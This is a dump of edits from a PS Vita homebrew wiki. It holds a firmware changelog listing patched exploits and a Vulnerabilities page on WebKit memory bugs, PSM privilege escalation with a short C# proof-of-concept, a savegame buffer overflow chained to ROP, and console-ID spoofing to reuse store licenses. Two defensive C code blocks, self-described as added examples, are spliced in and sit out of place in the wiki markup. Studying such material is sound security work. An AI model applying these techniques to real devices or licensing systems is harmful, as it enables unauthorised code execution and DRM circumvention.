* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several undisclosed game exploits (Fieldrunners and others) were fixed, disallowing the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various known exploit titles have been fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles have been fixed as well.<br />
* Internal firmware changes now prevent the execution of larger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis that lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* A full array of languages has been added to [External Keyboard] settings (previously Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256MB of memory reserved for the operating system is now free for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that use SceSsl); two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11235Main Page/Header2019-07-02T22:47:19Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To The One And Only Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/News&diff=11225Main Page/News2019-05-05T18:50:43Z<p>Xyz: </p>
<hr />
<div>{{Box-round|title=News|<br />
* '''2019-05-05''': Trinity is released<br />
* '''2018-12-29''': [https://media.ccc.de/v/35c3-9364-viva_la_vita_vida 35C3: Viva la Vita Vida]<br />
* '''2018-07-01''': h-encore is released<br />
* '''2017-07-29''': HENkaku Ensō is released<br />
* '''2016-07-29''': HENkaku is released<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11092Main Page/Header2019-02-24T18:08:59Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10704Vulnerabilities2019-02-09T01:40:07Z<p>Xyz: /* WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order for HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> which uses type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, in the parseFloat() function using NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered anonymously. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
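Both JSArray::sort bugs on this page (the length-reducing comparator in the 2.00-3.20 WebKit and the toString-triggered reallocation in the 3.50-3.60 WebKit) are the same class of defect: native code captures a pointer and a length into a script-owned buffer, calls back into script, and keeps using the captured values after the script has shrunk or moved the buffer. The following C model is an added example, not WebKit's code; `struct js_array`, `js_array_push`, `js_array_truncate` and `js_array_sort_checked` are names assumed for the example. It shows the defensive shape of the fix: re-validate the live array after every callback and abandon the sort if it changed.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model of an engine-owned growable array. It stands in for
 * JSArray's m_storage->m_vector; names here are assumptions for this
 * example, not WebKit identifiers. */
struct js_array {
    int   *vector;    /* backing store, may move when reallocated */
    size_t length;    /* live element count, may shrink mid-sort */
    size_t capacity;
};

/* Plays the role of the user-supplied JS compare function (or a toString
 * reached from it): it receives the array so it can mutate it mid-sort. */
typedef int (*compare_fn)(struct js_array *a, int x, int y);

/* Appending past capacity reallocates and frees the old vector: the
 * toString-triggered reallocation behind the 3.50-3.60 use-after-free. */
int js_array_push(struct js_array *a, int v)
{
    if (a->length == a->capacity) {
        size_t ncap = a->capacity ? a->capacity * 2 : 4;
        int *nv = realloc(a->vector, ncap * sizeof *nv);
        if (nv == NULL)
            return -1;
        a->vector = nv;
        a->capacity = ncap;
    }
    a->vector[a->length++] = v;
    return 0;
}

/* Shrinking in place: what a comparator that assigns arr.length = 0 does
 * (the 2.00-3.20 heap overflow). */
void js_array_truncate(struct js_array *a, size_t new_len)
{
    if (new_len < a->length)
        a->length = new_len;
}

/* Hardened insertion sort. The vulnerable pattern captures vector and length
 * once at entry and trusts them after every callback. Here each return from
 * the comparator is followed by a re-check against the live array; if the
 * store moved or the length changed the sort is abandoned (-1) instead of
 * writing through a stale pointer or past the new end. */
int js_array_sort_checked(struct js_array *a, compare_fn cmp)
{
    int *vec = a->vector;
    size_t len = a->length;

    for (size_t i = 1; i < len; i++) {
        int key = vec[i];
        size_t j = i;
        while (j > 0) {
            int r = cmp(a, vec[j - 1], key);
            if (a->vector != vec || a->length != len)
                return -1;              /* mutated under us: bail out */
            if (r <= 0)
                break;
            vec[j] = vec[j - 1];        /* still within the live bounds */
            j--;
        }
        vec[j] = key;
    }
    return 0;
}

/* Three comparators: well-behaved, length-reducing, store-reallocating. */
int cmp_plain(struct js_array *a, int x, int y) { (void)a; return x - y; }

int cmp_truncate(struct js_array *a, int x, int y)
{
    js_array_truncate(a, 0);            /* arr.length = 0 inside compare */
    return x - y;
}

int cmp_realloc(struct js_array *a, int x, int y)
{
    size_t cap = a->capacity;
    while (a->capacity == cap)          /* push until the backing store grows */
        if (js_array_push(a, 0) != 0)
            break;
    return x - y;
}

/* Builds [n, n-1, ..., 1] so a plain sort has real work to do. */
struct js_array make_descending(size_t n)
{
    struct js_array a = { NULL, 0, 0 };
    for (size_t v = n; v >= 1; v--)
        js_array_push(&a, (int)v);
    return a;
}

int main(void)
{
    struct js_array a = make_descending(5), b = make_descending(5), c = make_descending(5);
    printf("plain comparator:       %s\n", js_array_sort_checked(&a, cmp_plain) == 0 ? "sorted" : "aborted");
    printf("shrinking comparator:   %s\n", js_array_sort_checked(&b, cmp_truncate) == 0 ? "sorted" : "aborted");
    printf("reallocating comparator: %s\n", js_array_sort_checked(&c, cmp_realloc) == 0 ? "sorted" : "aborted");
    free(a.vector); free(b.vector); free(c.vector);
    return 0;
}
```

The check after each callback is deliberately strict (any change aborts); an engine could instead reload the vector and length and continue, but the invariant is the same: nothing captured before a call into script may be used after it without re-validation.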
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (it can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource-based hack just as difficult as unsigned code execution hacks (which are the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way we could get more syscalls than the browser uses: syscall numbers are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 or lower were compiled as statically linked executables, so their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also do not have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping to smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. The bug was implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into one of a list of buffers. However, it does not validate the length, so if we place the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is the list holding the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
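<br />
Defensive counterpart to the parser bug described above, added here as an illustration and not code from the Bittersmile game or from h-encore: a line-based save loader with the layout the description implies (fixed line buffers followed by the destination table), where the unchecked copy is replaced by a length-checked one, plus a validator that flags an overlong line before a save is trusted. <code>LINE_CAP</code>, <code>MAX_LINES</code>, the struct, the function names and the sample saves are constructed for the example; the real game's buffer sizes are not on this page.<br />
<br />
```c
/* Added example: hardened line-based save loader. Not game or h-encore code;
 * sizes, names and sample inputs are constructed for illustration. */
#include <stddef.h>
#include <string.h>

#define LINE_CAP  32   /* assumed capacity of one line buffer (constructed) */
#define MAX_LINES 4

/* Layout implied by the description above: fixed-size line buffers followed
 * by the table of destination pointers the loader copies each line through.
 * An unchecked copy that runs past LINE_CAP lands in `dest`, which is why the
 * original bug became an arbitrary write: the following line is then copied
 * to wherever the clobbered pointer says. */
struct save_state {
    char  lines[MAX_LINES][LINE_CAP];
    char *dest[MAX_LINES];
};

/* Hardened copy: refuse any line that does not fit, terminator included. */
static int copy_line_checked(char *dst, size_t cap, const char *src, size_t len)
{
    if (len >= cap)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse `text` line by line into `st`. Returns the number of lines loaded,
 * or -(index + 1) of the first line that would have overflowed its buffer. */
int load_save(struct save_state *st, const char *text)
{
    memset(st, 0, sizeof *st);
    for (int i = 0; i < MAX_LINES; i++)
        st->dest[i] = st->lines[i];

    int n = 0;
    const char *p = text;
    while (*p != '\0' && n < MAX_LINES) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (copy_line_checked(st->dest[n], LINE_CAP, p, len) != 0)
            return -(n + 1);
        n++;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return n;
}

/* Same scan as a stand-alone validator, usable before a save is trusted:
 * returns the index of the first line longer than LINE_CAP - 1, or -1. */
int find_overlong_line(const char *text)
{
    int i = 0;
    for (const char *p = text; *p != '\0'; i++) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= LINE_CAP)
            return i;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return -1;
}

/* Load into a scratch state and report load_save's result. */
int load_save_count(const char *text)
{
    struct save_state st;
    return load_save(&st, text);
}
```
<br />
The validator is the piece a fuzzing harness or a save importer can run up front: a save whose lines all fit <code>LINE_CAP</code> cannot reach the destination table, whatever the rest of its content is.<br />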
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can secure PSVita's store as much as they want; we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
